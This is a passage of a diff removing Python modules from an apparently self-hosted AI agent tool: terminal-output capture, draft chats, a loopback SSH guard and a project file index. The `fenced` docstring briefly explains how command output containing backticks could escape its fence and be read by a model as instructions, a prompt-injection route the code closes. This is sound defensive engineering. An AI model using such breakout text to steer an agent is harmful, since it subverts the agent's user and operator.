async def list_dir(self, path: str) -> list[str]: ...
async def scan_dir(self, path: str) -> list[RemoteEntry]: ...
def clean_output(data: bytes | str, *, limit: int) -> tuple[str, bool]:
"""Decode, strip escape sequences, and cap. Returns (text, truncated)."""
text = data.decode("utf-8", "replace") if isinstance(data, bytes) else data
text = _ANSI.sub("", text)
if len(text) <= limit:
return text, False
return text[:limit].rstrip() + "\n… (truncated)", True
__all__ = [
"DEFAULT_MAX_BYTES",
"DEFAULT_TIMEOUT",
"ExecError",
"ExecRequest",
"ExecResult",
"Executor",
"RemoteEntry",
"Target",
"clean_output",
]
-164
View File
@@ -1,164 +0,0 @@
"""One command and its output, kept so it can be handed to a model.
Bounded at both ends rather than only the front. A build that fails ten
megabytes in has the invocation and the configuration at the top and the error
at the bottom, and either half alone is the wrong half.
Raw bytes are kept and decoded only when somebody asks. Head/tail slicing
splits UTF-8 characters at will, and `base.clean_output` decodes with
`errors="replace"`, which is exactly the right handling -- decoding eagerly per
chunk would be the same mistake the terminal pump already avoids.
"""
from __future__ import annotations
import re
import time
from collections import deque
from dataclasses import dataclass, field
from lembas.services.agent.base import clean_output
# What one command's output may keep, at each end.
CAPTURE_HEAD_BYTES = 48 * 1024
CAPTURE_TAIL_BYTES = 16 * 1024
# The command line itself. Longer than any command and shorter than a paste.
CAPTURE_COMMAND_BYTES = 4 * 1024
# One line of output. A minified bundle on one line is not worth keeping whole.
MAX_LINE_CHARS = 2000
# C0 except tab and newline, and the C1 block. Not in `clean_output`, which
# `shell_run` shares: there a control character inside a file's contents is
# data. Here it is a terminal being driven.
_CONTROLS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]")
def flatten(text: str) -> str:
"""What the screen would have shown, from what the wire carried.
The highest-value transform here by a distance. A progress bar redraws
itself by returning to the start of the line and writing again; keeping
every state turns two megabytes of `pip install` into two megabytes of
spinner in somebody's prompt. Only the last state of a line was ever
visible, so only the last state is kept.
"""
lines = []
for line in text.replace("\r\n", "\n").split("\n"):
if "\r" in line:
line = line.rsplit("\r", 1)[-1]
lines.append(_CONTROLS.sub("", line)[:MAX_LINE_CHARS])
return "\n".join(lines).strip("\n")
def fenced(text: str) -> str:
"""A fence long enough that the content cannot end it early.
Output containing three backticks would otherwise break out, and everything
after it would read to the model as prose rather than as what a machine
printed. That is a real injection route and it costs one line to close.
"""
longest = max((len(run) for run in re.findall(r"`+", text)), default=0)
ticks = "`" * max(3, longest + 1)
return f"{ticks}console\n{text}\n{ticks}"
@dataclass
class Capture:
"""A command, and as much of its output as is worth keeping."""
seq: int = 0
command: str = ""
cwd: str = ""
started: float = field(default_factory=time.monotonic)
ended: float = 0.0
exit_status: int | None = None # None while it is still running
head: bytearray = field(default_factory=bytearray)
tail: deque[bytes] = field(default_factory=deque)
tail_bytes: int = 0
dropped: int = 0
total: int = 0
@property
def running(self) -> bool:
return self.exit_status is None
@property
def duration_ms(self) -> int:
end = self.ended or time.monotonic()
return int((end - self.started) * 1000)
def absorb(self, chunk: bytes) -> None:
"""Keep the front, keep the back, count what fell out of the middle."""
self.total += len(chunk)
if len(self.head) < CAPTURE_HEAD_BYTES:
take = CAPTURE_HEAD_BYTES - len(self.head)
self.head += chunk[:take]
chunk = chunk[take:]
if not chunk:
return
self.tail.append(chunk)
self.tail_bytes += len(chunk)
while self.tail_bytes > CAPTURE_TAIL_BYTES and len(self.tail) > 1:
gone = self.tail.popleft()
self.tail_bytes -= len(gone)
self.dropped += len(gone)
def output(self) -> str:
"""The kept output as text, with the gap marked if there is one."""
head = flatten(clean_output(bytes(self.head), limit=CAPTURE_HEAD_BYTES * 2)[0])
if not self.dropped and not self.tail:
return head
tail = flatten(clean_output(b"".join(self.tail), limit=CAPTURE_TAIL_BYTES * 2)[0])
if not self.dropped:
return f"{head}\n{tail}" if tail else head
gap = f"\n\n{self.dropped / 1024:,.0f} KB dropped …\n\n"
return f"{head}{gap}{tail}"
def as_text(self, *, label: str) -> str:
"""The block that goes into a message, attribution and all.
The sentence sits **outside** the fence and is written here, so nothing
the far side printed can forge it, and the `$ ` line is synthesised
rather than lifted from the shell -- what the shell echoed carries
readline's editing escapes and is not the command.
"""
where = f", in {self.cwd}" if self.cwd else ""
if self.running:
how = "still running"
elif self.exit_status:
how = f"exit {self.exit_status}"
else:
how = "succeeded"
seconds = self.duration_ms / 1000
took = f" after {seconds:.0f}s" if seconds >= 1 else ""
body = f"$ {self.command}\n{self.output()}".rstrip()
return (
f"Ran in the terminal on {label}{where}{how}{took}:\n\n{fenced(body)}"
)
def summary(self) -> str:
"""A short label for a chip, never rendered as markup."""
command = self.command or "(no command)"
if len(command) > 60:
command = command[:57] + ""
if self.running:
return f"{command} · running"
return f"{command} · exit {self.exit_status}"
def trim_command(raw: str) -> str:
text, _ = clean_output(raw, limit=CAPTURE_COMMAND_BYTES)
return _CONTROLS.sub("", text).strip()
__all__ = [
"CAPTURE_COMMAND_BYTES",
"CAPTURE_HEAD_BYTES",
"CAPTURE_TAIL_BYTES",
"Capture",
"fenced",
"flatten",
"trim_command",
]
-183
View File
@@ -1,183 +0,0 @@
"""A chat that does not exist yet, so its panels can.
Chats are created lazily -- there is no endpoint that makes an empty one, and
the row appears together with its first message. That is a rule worth keeping:
an opened-and-abandoned composer should leave nothing behind. But it also meant
the terminal and the canvas were unavailable on the one screen where you are
deciding *which machine to work on*, which is exactly when you want to look
around it first.
A draft is the smallest thing that fixes that: an id, and the three facts the
panels need behind it. It is not a chat and never becomes one -- when the first
prompt is sent, a real chat is created and the draft's shell and tabs are
**adopted** into it, which is a re-key and a copy rather than a promotion.
The id is derived from (owner, connection, directory) rather than invented, so
that returning to the same new-chat screen finds the same shell and the same
tabs instead of quietly starting a second one. It is a hash so that neither the
directory nor the owner is legible in a URL.
"""
from __future__ import annotations
import hashlib
import time
from dataclasses import dataclass, field
from typing import Any
# How long a draft survives without being touched. Generous, because it is
# holding somebody's open files while they decide what to do; bounded, because
# nothing else will ever clean it up -- an abandoned new-chat screen leaves no
# row to cascade from and no chat to delete.
IDLE_TIMEOUT = 3600.0
# The prefix a draft id carries. It has to be distinguishable from a chat id at
# a glance and by code: `Chat.id` is 32 hex characters from `new_id`, so
# nothing here can collide with one by accident.
PREFIX = "draft_"
@dataclass
class Draft:
"""What a draft knows, which is only what the panels ask for."""
id: str
owner_id: str
profile_id: str
project_dir: str
# The canvas's tab strip, in the shape `Chat.canvas_json` holds. In memory
# rather than on a row for the obvious reason, and carried onto the chat at
# adoption.
canvas_json: dict = field(default_factory=dict)
touched_at: float = field(default_factory=time.monotonic)
_DRAFTS: dict[str, Draft] = {}
def is_draft(chat_id: str) -> bool:
return bool(chat_id) and chat_id.startswith(PREFIX)
def key_for(owner_id: str, profile_id: str, project_dir: str) -> str:
"""The id for one (owner, connection, directory), stably.
Derived rather than random so that reopening the new-chat screen on the same
target finds the shell that is already running there. The owner is in the
hash so that two people pointed at the same directory of the same connection
do not share a draft -- they would share a *shell*, and the terminal's own
"one chat, one shell" rule is scoped to a person's chats.
"""
material = "\0".join((owner_id, profile_id, project_dir or ""))
digest = hashlib.sha256(material.encode("utf-8")).hexdigest()
return f"{PREFIX}{digest[:24]}"
def remember(owner_id: str, profile_id: str, project_dir: str) -> Draft:
"""The draft for this target, created if this is the first time."""
_sweep()
key = key_for(owner_id, profile_id, project_dir)
draft = _DRAFTS.get(key)
if draft is None:
draft = Draft(
id=key, owner_id=owner_id, profile_id=profile_id, project_dir=project_dir or ""
)
_DRAFTS[key] = draft
draft.touched_at = time.monotonic()
return draft
def get(draft_id: str, owner_id: str) -> Draft | None:
"""One draft, if it is this person's.
The id is a hash of the owner, so a draft belonging to somebody else cannot
be guessed -- but it is checked rather than assumed, because "unguessable"
is not an authorisation and the next caller might build the id differently.
"""
draft = _DRAFTS.get(draft_id or "")
if draft is None or draft.owner_id != owner_id:
return None
draft.touched_at = time.monotonic()
return draft
def forget(draft_id: str) -> None:
_DRAFTS.pop(draft_id or "", None)
def clear() -> None:
_DRAFTS.clear()
def as_chat(draft: Draft) -> Any:
"""A `Chat` the panels can use, constructed and never saved.
This is the whole trick, and it is worth being precise about why it is safe.
`canvas.agent_ready`, `canvas._executor`, `_load_agent`/`_save_agent` and
`agent_session.resolve` read exactly four things off a chat -- `user_id`,
`kind`, `ssh_profile_id` and `project_dir` -- and none of them passes the
chat to a query or writes it back. So a transient row satisfies every one of
them unchanged, and no code that already works has to learn what a draft is.
`id` and `canvas_json` are set explicitly: both are *column* defaults, which
SQLAlchemy applies at flush, and this row is never flushed. An unset `id` is
not a cosmetic problem -- see `SOURCES_NEEDING_A_CHAT`.
"""
from lembas.db.models import KIND_AGENT, Chat
return Chat(
id=draft.id,
user_id=draft.owner_id,
kind=KIND_AGENT,
ssh_profile_id=draft.profile_id,
project_dir=draft.project_dir,
canvas_json=dict(draft.canvas_json or {}),
agent_mode="",
scope_json={},
)
# Canvas sources a draft may not open, refused by name.
#
# `scratch` needs a row: `scratch_service.for_chat` would write a `ScratchDoc`
# keyed on a chat that does not exist, which is the lazy-creation rule broken
# outright rather than bent.
#
# `file` is the one that matters. `canvas._load_file` authorises with
# `attachment.chat_id != chat.id`, and an upload made on the new-chat screen is
# stored with `chat_id=None`. If a draft's chat carried no id, `None != None` is
# False and every unclaimed attachment its owner has would open from any draft
# canvas. `as_chat` sets an id, so that comparison already fails -- but relying
# on it would mean the guarantee lives in an id-shaped coincidence. It is stated
# here instead, where it can be read and tested.
SOURCES_NEEDING_A_CHAT = frozenset({"scratch", "file"})
def refuses(source: str) -> bool:
return source in SOURCES_NEEDING_A_CHAT
def _sweep() -> None:
"""Drop drafts nobody has touched in a long while.
On write rather than on a timer: a draft holds no connection and no process,
only a little state, so there is nothing to close and nothing that leaks by
being late. The shell it points at has its own reaper.
"""
cutoff = time.monotonic() - IDLE_TIMEOUT
for key in [k for k, d in _DRAFTS.items() if d.touched_at < cutoff]:
_DRAFTS.pop(key, None)
__all__ = [
"SOURCES_NEEDING_A_CHAT",
"Draft",
"as_chat",
"clear",
"forget",
"get",
"is_draft",
"key_for",
"refuses",
"remember",
]
-249
View File
@@ -1,249 +0,0 @@
"""Whether an SSH connection is allowed to point back at this machine.
The whole design of agent chats rests on one sentence: nothing runs on the host
LLeMbas is installed on. That is why there is no local sandbox, why local MCP
over stdio is absent, and why "the security of an agent chat is the security of
the host behind its profile" is a statement anybody can check.
An SSH profile pointed at `127.0.0.1` walks straight past it. The commands go
over SSH, through a real login, and every gate in `policy.py` still applies --
and they land on the machine holding the database, the Fernet key and every
other user's encrypted credentials. Nothing else in the codebase can tell that
apart from a container on the network, because from the SSH layer's point of
view it is not different.
So it is a decision an administrator makes deliberately, in one of three
positions:
- **off** (the default, including on an instance upgrading into this) -- no
connection may point at loopback, and one that already does is refused rather
than quietly kept working.
- **port** -- allowed on exactly one port. This is the position that has a real
use: a container that publishes its SSH port on the host's loopback interface
is genuinely somewhere else, and `127.0.0.1:2222` is how you reach it. Port 22
is refused even here, because that is the host's own sshd.
- **on** -- allowed anywhere. For somebody who has read the paragraph above and
means it.
## Literal or resolved, and never resolved on the request path
Both are checked, at two different moments, and the split is not tidiness.
The literal forms -- `127.0.0.1`, `::1`, `localhost`, anything in
`127.0.0.0/8` -- are decided from the string with no I/O at all. That is the
check `refusal` makes, and it is why `refusal` can be called from a page render,
from `resolve_tools` and from the composer's profile listing.
A *name* that resolves to loopback needs `getaddrinfo`, which is a blocking
network call, and putting one of those behind a check that runs several times
per request is how a page render comes to wait out a DNS timeout for a host
nobody is even talking to. The first version of this file did exactly that and
the test suite went from two minutes to not finishing. So resolution happens
**only where a network call is already expected and already awaited** -- saving
a connection, and pressing Check -- and the answer is written to
`SshProfile.resolves_here`, which the request path reads for free.
The consequence, stated rather than discovered: a name whose DNS changes to
point here after it was saved is not noticed until it is saved or checked again.
That is a real gap and it is the right trade. The alternative is a DNS lookup in
front of every agent page load, and a guard that makes the application feel
broken is a guard somebody turns off.
A refusal is never silent. Every caller that has somewhere to put a sentence
puts this one there, because "this connection cannot be used" with no reason is
indistinguishable from a bug.
"""
from __future__ import annotations
import ipaddress
import logging
import socket
from typing import TYPE_CHECKING
if TYPE_CHECKING: # pragma: no cover - typing only
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import SshProfile
log = logging.getLogger(__name__)
MODE_OFF = "off"
MODE_PORT = "port"
MODE_ON = "on"
MODES = (MODE_OFF, MODE_PORT, MODE_ON)
MODE_LABELS = {
MODE_OFF: "Never",
MODE_PORT: "Only on one port",
MODE_ON: "Anywhere",
}
MODE_HINTS = {
MODE_OFF: (
"A connection to this machine is refused, and an existing one stops "
"working. This is what keeps “nothing runs on the LLeMbas host” true."
),
MODE_PORT: (
"For a container that publishes its SSH port on this machine's loopback "
"interface. Name that port; everything else here is still refused, and "
"port 22 is refused regardless, because that one is this host's own sshd."
),
MODE_ON: (
"Any port on this machine. Commands then run beside the database and the "
"encryption key, with whatever the login account can reach."
),
}
# The host's own sshd, and never what somebody means by "the container on 2222".
HOST_SSH_PORT = 22
def _literal(host: str) -> bool | None:
"""True/False when the host decides itself, None when it needs resolving."""
text = (host or "").strip().strip("[]").lower()
if not text:
return False
# Not a real hostname anywhere, and the one everybody types.
if text in ("localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"):
return True
try:
address = ipaddress.ip_address(text)
except ValueError:
return None
# `is_unspecified` as well as `is_loopback`, because `0.0.0.0` and `::` are
# neither a real destination nor a refused one: connect() to either goes to
# loopback on Linux, so an SSH profile pointed at `0.0.0.0` reached this
# host's own sshd. `is_loopback` alone answered a decided **False**, which
# also short-circuited `resolves_here`, so the DNS half never ran either --
# the one spelling of "this machine" that walked past a guard whose whole
# job is that sentence.
return address.is_loopback or address.is_unspecified
def is_loopback(host: str) -> bool:
"""Whether this host *string* reaches the machine LLeMbas is running on.
No I/O, ever. A name is answered False here and settled by `resolves_here`
at the two moments a lookup is affordable -- see the module docstring; the
version of this that resolved inline made every agent page wait on DNS.
"""
return bool(_literal(host))
def resolves_here(host: str) -> bool:
"""The same question for a name, by resolving it. Blocking; call sparingly.
Resolution failure is answered **False**: a name that does not resolve is not
a name pointing here, and refusing it would turn every DNS hiccup into "your
connection is on this machine", which is both wrong and confusing. The
connection itself will fail on its own terms a moment later.
"""
decided = _literal(host)
if decided is not None:
return decided
try:
for entry in socket.getaddrinfo((host or "").strip().lower(), None):
if _literal(str(entry[4][0])):
return True
except OSError:
return False
return False
def policy(db: DBSession) -> tuple[str, int]:
"""The configured position, and the port that goes with `port`."""
from lembas.services import settings_store
values = settings_store.agents(db)
mode = str(values.get("loopback") or MODE_OFF)
if mode not in MODES:
mode = MODE_OFF
try:
port = int(values.get("loopback_port") or 0)
except (TypeError, ValueError):
port = 0
return mode, port
def refusal(db: DBSession, host: str, port: int, *, resolved: bool = False) -> str:
"""Why this host and port may not be used, or "" if they may.
A sentence rather than a boolean, because every caller has somewhere to show
one and a connection that is unavailable for no stated reason reads as a
fault in the application.
`resolved` is what a stored profile's `resolves_here` column carries in: the
string said nothing, and a lookup made earlier said yes.
"""
if not (resolved or is_loopback(host)):
return ""
mode, allowed = policy(db)
if mode == MODE_ON:
return ""
if mode == MODE_PORT:
if allowed and port == allowed and port != HOST_SSH_PORT:
return ""
if allowed:
return (
f"This connection points at this machine, which is only allowed "
f"on port {allowed}. An administrator sets that on the Agents page."
)
return (
"This connection points at this machine, which is allowed only on a "
"port an administrator has named — and none has been."
)
return (
"This connection points at the machine LLeMbas itself runs on, which an "
"administrator has not allowed. Agent chats are meant to reach a "
"different host; running here would put the commands beside the database "
"and the encryption key."
)
def refusal_for(db: DBSession, profile: SshProfile | None) -> str:
"""The same answer for a stored profile, with no lookup.
`resolves_here` is the verdict recorded the last time somebody saved or
checked this connection. Reading it is what keeps this callable from a page
render.
"""
if profile is None:
return ""
return refusal(
db, profile.host, profile.port, resolved=bool(getattr(profile, "resolves_here", False))
)
def usable(db: DBSession, profile: SshProfile | None) -> bool:
return not refusal_for(db, profile)
def restamp(profile: SshProfile) -> bool:
"""Record whether this profile's host resolves to loopback, and return it.
Called where a network call is already happening -- saving a connection, and
Check. The column is the request path's only way of knowing about a *name*,
so a save that skips this leaves the guard reading a stale answer.
"""
profile.resolves_here = resolves_here(profile.host)
return profile.resolves_here
__all__ = [
"HOST_SSH_PORT",
"MODES",
"MODE_HINTS",
"MODE_LABELS",
"MODE_OFF",
"MODE_ON",
"MODE_PORT",
"is_loopback",
"policy",
"refusal",
"refusal_for",
"resolves_here",
"restamp",
"usable",
]
-528
View File
@@ -1,528 +0,0 @@
"""What is in a project directory, for the picker and for the model.
Two things want this list. The `@` picker needs something to filter, and a
model working in a directory should know roughly what is in it rather than
spending its first two rounds finding out. Both want the same walk, so it
happens once and is cached.
**Three ways of getting it, in order.** `git ls-files` first, because most
project directories are repositories and it applies `.gitignore` for free --
without which the answer for a Node project is forty thousand paths under
`node_modules`. Then `find`, with the usual noise pruned by hand. Then a
recursive SFTP walk, which always works and costs a round trip per directory.
**Two commands run here, and neither goes through `agent/policy.py`.** That is
deliberate and it is the same argument the terminal panel and the directory
browser rest on: this is LLeMbas listing a directory on somebody's behalf, not
a model choosing to run something. Both are read-only, both are built here
rather than assembled from anything a model said, and the project directory is
configuration rather than input. It is still an exception to Manual mode's
"everything is shown to you before it happens", and it is written down in
the working notes, next to the others.
**Nothing here is trusted.** Filenames come off somebody else's machine and end
up inside a system prompt, so they are stripped of control characters, capped
in length, capped in number, and never interpreted.
"""
from __future__ import annotations
import asyncio
import logging
import re
import time
from dataclasses import dataclass, field
from lembas.services.agent.base import ExecError, ExecRequest, Executor
log = logging.getLogger(__name__)
# How many paths are kept. Past this the index says it was truncated, which the
# rendering repeats to the model -- "there is nothing else here" and "I stopped
# looking" are different answers and it must not give the first for the second.
MAX_ENTRIES = 20_000
# One path. Longer than any real one and shorter than an attack.
MAX_PATH = 400
# How long a walk may take before it is abandoned. The index is a convenience;
# a chat must never sit waiting for one.
BUILD_TIMEOUT = 20.0
# Output budget for the listing commands. Twenty thousand paths at forty
# characters is 800KB, so this has room and still refuses a runaway.
MAX_OUTPUT = 2 * 1024 * 1024
# How long a built index is reused, and how many are kept at once. A project
# directory changes under you -- the model writes files into it -- so this is
# short. `refresh` exists for when short is not short enough.
TTL = 300.0
MAX_CACHED = 64
# How deep the SFTP fallback goes, and how many directories it will open. It is
# a round trip per directory, so an unbounded walk of somebody's home directory
# would take minutes and achieve nothing.
SFTP_MAX_DEPTH = 6
SFTP_MAX_DIRS = 400
# Pruned from the `find` and SFTP paths. Not applied to `git ls-files`, which
# has already applied the repository's own rules and where a checked-in
# `vendor/` is checked in on purpose -- this project's own hash-pinned browser
# libraries live in one.
IGNORED = (
".git",
".hg",
".svn",
"node_modules",
"__pycache__",
".venv",
"venv",
".mypy_cache",
".pytest_cache",
".ruff_cache",
".tox",
".next",
".nuxt",
".gradle",
".terraform",
"target",
"dist",
"build",
".DS_Store",
)
# Control characters, including the escape that would let a filename repaint
# the transcript it is quoted in.
_CONTROL = re.compile(r"[\x00-\x1f\x7f-\x9f]")
@dataclass(frozen=True)
class ProjectIndex:
"""A snapshot of what was in a directory, and how it was found out."""
paths: tuple[str, ...] = ()
total: int = 0
truncated: bool = False
source: str = ""
built_at: float = field(default=0.0)
@property
def ok(self) -> bool:
return bool(self.paths)
# --- Building ----------------------------------------------------------------
def _clean(raw: str) -> str:
"""One path, made safe to put in a prompt and in an attribute."""
path = _CONTROL.sub("", raw.strip()).lstrip("./")
return path[:MAX_PATH]
def _collect(output: str) -> tuple[tuple[str, ...], int, bool]:
seen: set[str] = set()
paths: list[str] = []
total = 0
for line in output.splitlines():
path = _clean(line)
if not path or path in seen:
continue
total += 1
if len(paths) < MAX_ENTRIES:
seen.add(path)
paths.append(path)
paths.sort()
return tuple(paths), total, total > len(paths)
async def _from_git(executor: Executor, project_dir: str) -> ProjectIndex | None:
"""Tracked and untracked files, minus whatever `.gitignore` excludes.
`--exclude-standard` is what makes this worth trying first: the repository
already carries somebody's considered list of what is not part of the
project, and reproducing it by hand is how an index ends up ninety percent
build output.
"""
result = await executor.run(
ExecRequest(
command="git ls-files -c -o --exclude-standard 2>/dev/null",
cwd=project_dir,
timeout=BUILD_TIMEOUT,
max_bytes=MAX_OUTPUT,
)
)
if not result.ok or not result.output.strip():
return None
paths, total, truncated = _collect(result.output)
if not paths:
return None
return ProjectIndex(
paths=paths, total=total, truncated=truncated or result.truncated, source="git"
)
def _find_command() -> str:
prunes = " -o ".join(f"-name {name!r}" for name in IGNORED)
# -print rather than -print0: the output is read as text either way, and a
# filename containing a newline splits into two entries that resolve to
# nothing rather than into anything dangerous.
return f"find . \\( {prunes} \\) -prune -o -print 2>/dev/null"
async def _from_find(executor: Executor, project_dir: str) -> ProjectIndex | None:
result = await executor.run(
ExecRequest(
command=_find_command(),
cwd=project_dir,
timeout=BUILD_TIMEOUT,
max_bytes=MAX_OUTPUT,
)
)
if not result.output.strip():
return None
paths, total, truncated = _collect(result.output)
if not paths:
return None
return ProjectIndex(
paths=paths, total=total, truncated=truncated or result.truncated, source="find"
)
async def _from_sftp(executor: Executor, project_dir: str) -> ProjectIndex:
"""The one that always works, and the one that is slow.
Bounded twice over -- by depth and by how many directories it will open --
because this is a network round trip per directory and an unbounded walk of
a home directory would take minutes to produce something unusable.
"""
found: list[str] = []
opened = 0
queue: list[tuple[str, int]] = [("", 0)]
while queue and opened < SFTP_MAX_DIRS and len(found) < MAX_ENTRIES:
where, depth = queue.pop(0)
opened += 1
try:
entries = await executor.scan_dir(where or project_dir)
except ExecError:
continue
for entry in entries:
if entry.name in IGNORED:
continue
path = f"{where}/{entry.name}" if where else entry.name
found.append(path + "/" if entry.is_dir else path)
if entry.is_dir and depth + 1 < SFTP_MAX_DEPTH:
queue.append((path, depth + 1))
paths, total, truncated = _collect("\n".join(found))
return ProjectIndex(
paths=paths,
total=total,
truncated=truncated or bool(queue),
source="sftp",
)
async def build(executor: Executor, project_dir: str) -> ProjectIndex:
"""Walk the directory, by whichever means works first."""
started = time.monotonic()
try:
found = None
for attempt in (_from_git, _from_find):
try:
found = await attempt(executor, project_dir)
except ExecError as exc:
# A rung that cannot run at all is a rung that did not answer,
# not the end of the ladder. A host that refuses exec entirely
# -- an SFTP-only account, a forced command -- is the exact case
# the SFTP rung below exists for, and letting this out skipped
# straight past it to an empty listing.
log.debug("indexing %s: %s did not run: %s", project_dir, attempt.__name__,
exc.message)
found = None
if found is not None:
break
if found is None:
found = await _from_sftp(executor, project_dir)
except ExecError as exc:
log.info("could not index %s: %s", project_dir, exc.message)
return ProjectIndex(built_at=time.monotonic())
log.debug(
"indexed %s: %d paths by %s in %dms",
project_dir,
len(found.paths),
found.source,
int((time.monotonic() - started) * 1000),
)
return ProjectIndex(
paths=found.paths,
total=found.total,
truncated=found.truncated,
source=found.source,
built_at=time.monotonic(),
)
# --- The cache ---------------------------------------------------------------
# Keyed on the connection and the directory, not the chat: two chats on the same
# box in the same tree are looking at the same files, and indexing it twice
# would double the cost to prove it.
_CACHE: dict[tuple[str, str], ProjectIndex] = {}
_BUILDING: dict[tuple[str, str], asyncio.Task] = {}
def cached(profile_id: str, project_dir: str) -> ProjectIndex | None:
"""What is already known, or None. Never does any work.
`harness.context_variables` is synchronous and sits on the request path, so
it may only ever call this -- an SFTP round trip from there would block a
request while somebody's box thought about it.
"""
found = _CACHE.get((profile_id, project_dir))
if found is None:
return None
if time.monotonic() - found.built_at > TTL:
_CACHE.pop((profile_id, project_dir), None)
return None
return found
async def ensure(
executor: Executor, profile_id: str, project_dir: str, *, refresh: bool = False
) -> ProjectIndex:
"""The index, building it if there is not a fresh one already.
Concurrent callers share one build. A reply and the `@` picker asking at
the same moment is the ordinary case, not a rare one, and two walks of the
same tree would be two of everything for one answer.
"""
key = (profile_id, project_dir)
if refresh:
_CACHE.pop(key, None)
elif (found := cached(profile_id, project_dir)) is not None:
return found
if (running := _BUILDING.get(key)) is not None:
return await asyncio.shield(running)
task = asyncio.create_task(build(executor, project_dir))
_BUILDING[key] = task
try:
found = await task
finally:
_BUILDING.pop(key, None)
_CACHE[key] = found
while len(_CACHE) > MAX_CACHED:
_CACHE.pop(next(iter(_CACHE)))
return found
# --- Rendering ---------------------------------------------------------------
# A tree that lists a thousand files is worse than no tree: it costs the window
# on every request forever and buries the four names that mattered. So the
# rendering has a character budget and elides what will not fit, saying how much
# it elided -- a directory shown as `src/vendor/ (412 files)` is a model being
# told where to look, which is the useful half of listing it.
INDENT = " "
# Below this a directory is never collapsed. Elision costs a line either way, so
# collapsing three files into "(3 files)" saves nothing and loses everything.
ALWAYS_SHOW = 4
def _tree(paths: tuple[str, ...]) -> dict:
root: dict = {}
for path in paths:
node = root
parts = [part for part in path.rstrip("/").split("/") if part]
for part in parts[:-1]:
node = node.setdefault(part, {})
if not isinstance(node, dict): # a file and a directory share a name
break
else:
if parts:
leaf = parts[-1]
if path.endswith("/"):
node.setdefault(leaf, {})
else:
node.setdefault(leaf, None)
return root
def _files_under(node: dict) -> int:
total = 0
for child in node.values():
total += _files_under(child) if isinstance(child, dict) else 1
return total
def _candidates(node: dict, prefix: str, depth: int, out: list) -> None:
"""Every directory, with what collapsing it would save."""
for name, child in node.items():
if not isinstance(child, dict):
continue
path = f"{prefix}{name}/"
count = _files_under(child)
full = _cost(child, depth + 1)
collapsed = len(f" ({count} files)")
if count > ALWAYS_SHOW and full > collapsed:
out.append((depth, count, path, full - collapsed))
_candidates(child, path, depth + 1, out)
def _cost(node: dict, depth: int) -> int:
"""Roughly how many characters rendering this subtree in full would take."""
total = 0
for name, child in node.items():
total += len(INDENT) * (depth + 1) + len(name) + 2
if isinstance(child, dict):
total += _cost(child, depth + 1)
return total
def _plan(root: dict, budget: int) -> set[str]:
"""Which directories to show as a count, so the rest fits.
Deepest and largest first. Collapsing by saving alone would take `src/`
before `src/web/static/vendor/` -- it is bigger, because it *contains* it --
and lose every name worth having to save one directory of hash-pinned
third-party files. Depth is the proxy for "further from what somebody was
looking for", and it is a good one.
"""
if _cost(root, 0) <= budget:
return set()
candidates: list[tuple[int, int, str, int]] = []
_candidates(root, "", 0, candidates)
candidates.sort(key=lambda item: (-item[0], -item[1]))
chosen: dict[str, int] = {}
saved = 0
total = _cost(root, 0)
for _depth, _count, path, saving in candidates:
if total - saved <= budget:
break
# A directory inside one already collapsed is not rendered at all, so
# collapsing it saves nothing.
if any(path.startswith(done) for done in chosen):
continue
# And a directory *containing* one already collapsed subsumes it. Its
# own saving is measured against the full subtree, so the descendant's
# has to come back off or the two are counted twice -- which stopped
# the loop early believing it had made room it had not.
for inside in [done for done in chosen if done.startswith(path)]:
saved -= chosen.pop(inside)
chosen[path] = saving
saved += saving
return set(chosen)
def _lines(
node: dict, prefix: str, depth: int, collapsed: set[str], budget: list[int]
) -> list[str]:
out: list[str] = []
# Files before directories at each level: the shallow names are the ones
# somebody would recognise, and if the budget runs out mid-tree they are
# the ones worth having spent it on.
files = sorted(name for name, child in node.items() if not isinstance(child, dict))
folders = sorted(name for name, child in node.items() if isinstance(child, dict))
for position, name in enumerate(files):
line = f"{INDENT * depth}{name}"
if budget[0] < len(line) + 1:
out.append(f"{INDENT * depth}{len(files) - position} more files")
budget[0] = 0
return out
budget[0] -= len(line) + 1
out.append(line)
for name in folders:
child = node[name]
path = f"{prefix}{name}/"
header = f"{INDENT * depth}{name}/"
if path in collapsed:
line = f"{header} ({_files_under(child)} files)"
budget[0] -= len(line) + 1
out.append(line)
continue
if budget[0] < len(header) + 1:
return out
budget[0] -= len(header) + 1
out.append(header)
out.extend(_lines(child, path, depth + 1, collapsed, budget))
return out
def render(index: ProjectIndex, budget: int) -> str:
"""The listing as the model sees it, inside `budget` characters.
Returns "" when there is nothing to say, so the fragment carrying it can
vanish entirely rather than appear as an empty heading -- which is what
`Fragment.requires` is for.
"""
if not index.ok or budget <= 0:
return ""
root = _tree(index.paths)
collapsed = _plan(root, budget)
# The plan has already made it fit, so this is a backstop rather than the
# mechanism -- with enough slack that an estimate a little off does not
# truncate a listing that was fine. What it is really for is the one shape
# collapsing cannot help with: five thousand files directly in the root,
# where there is no directory to fold them into.
remaining = [int(budget * 1.5) + 200]
lines = _lines(root, "", 0, collapsed, remaining)
if not lines:
return ""
note = ""
if index.truncated:
note = (
f"\n\nThere are more than {len(index.paths)} entries here; this is the "
"first of them, so treat it as a sample rather than the whole tree."
)
elif collapsed:
note = (
"\n\nDirectories shown with a count were left unopened to save room. "
"Use `file_list` to look inside one."
)
return "\n".join(lines) + note
def forget(profile_id: str) -> int:
"""Drop everything indexed through one connection.
Called when a profile is deleted, disabled or has its host key forgotten --
the same moments that close its terminals. Keeping a listing of a machine
somebody has just revoked would be a small leak of exactly the kind the
rest of this module is careful about.
"""
doomed = [key for key in _CACHE if key[0] == profile_id]
for key in doomed:
_CACHE.pop(key, None)
return len(doomed)
def forget_dir(profile_id: str, project_dir: str) -> None:
"""Drop one tree's listing, because something just changed it.
The TTL exists for drift nobody can see coming. A write through `file_write`
is not that: it is this process changing the tree it has just described, and
leaving five minutes of a listing that is known to be wrong is worse than
having none -- a model reading it concludes the file it created is missing.
"""
_CACHE.pop((profile_id, project_dir), None)
def clear() -> None:
_CACHE.clear()
__all__ = [
"MAX_ENTRIES",
"ProjectIndex",
"build",
"cached",
"clear",
"ensure",
"forget",
"forget_dir",
"render",
]
-212
View File
@@ -1,212 +0,0 @@
"""The project's own notes on how to work in it — AGENTS.md, CLAUDE.md.
A file in the root of the project directory, read once per reply and put in the
system message. Everything about the shape of this module is copied from
`index.py`, and for the same three reasons:
* **`cached()` never does work.** `harness.context_variables` is synchronous and
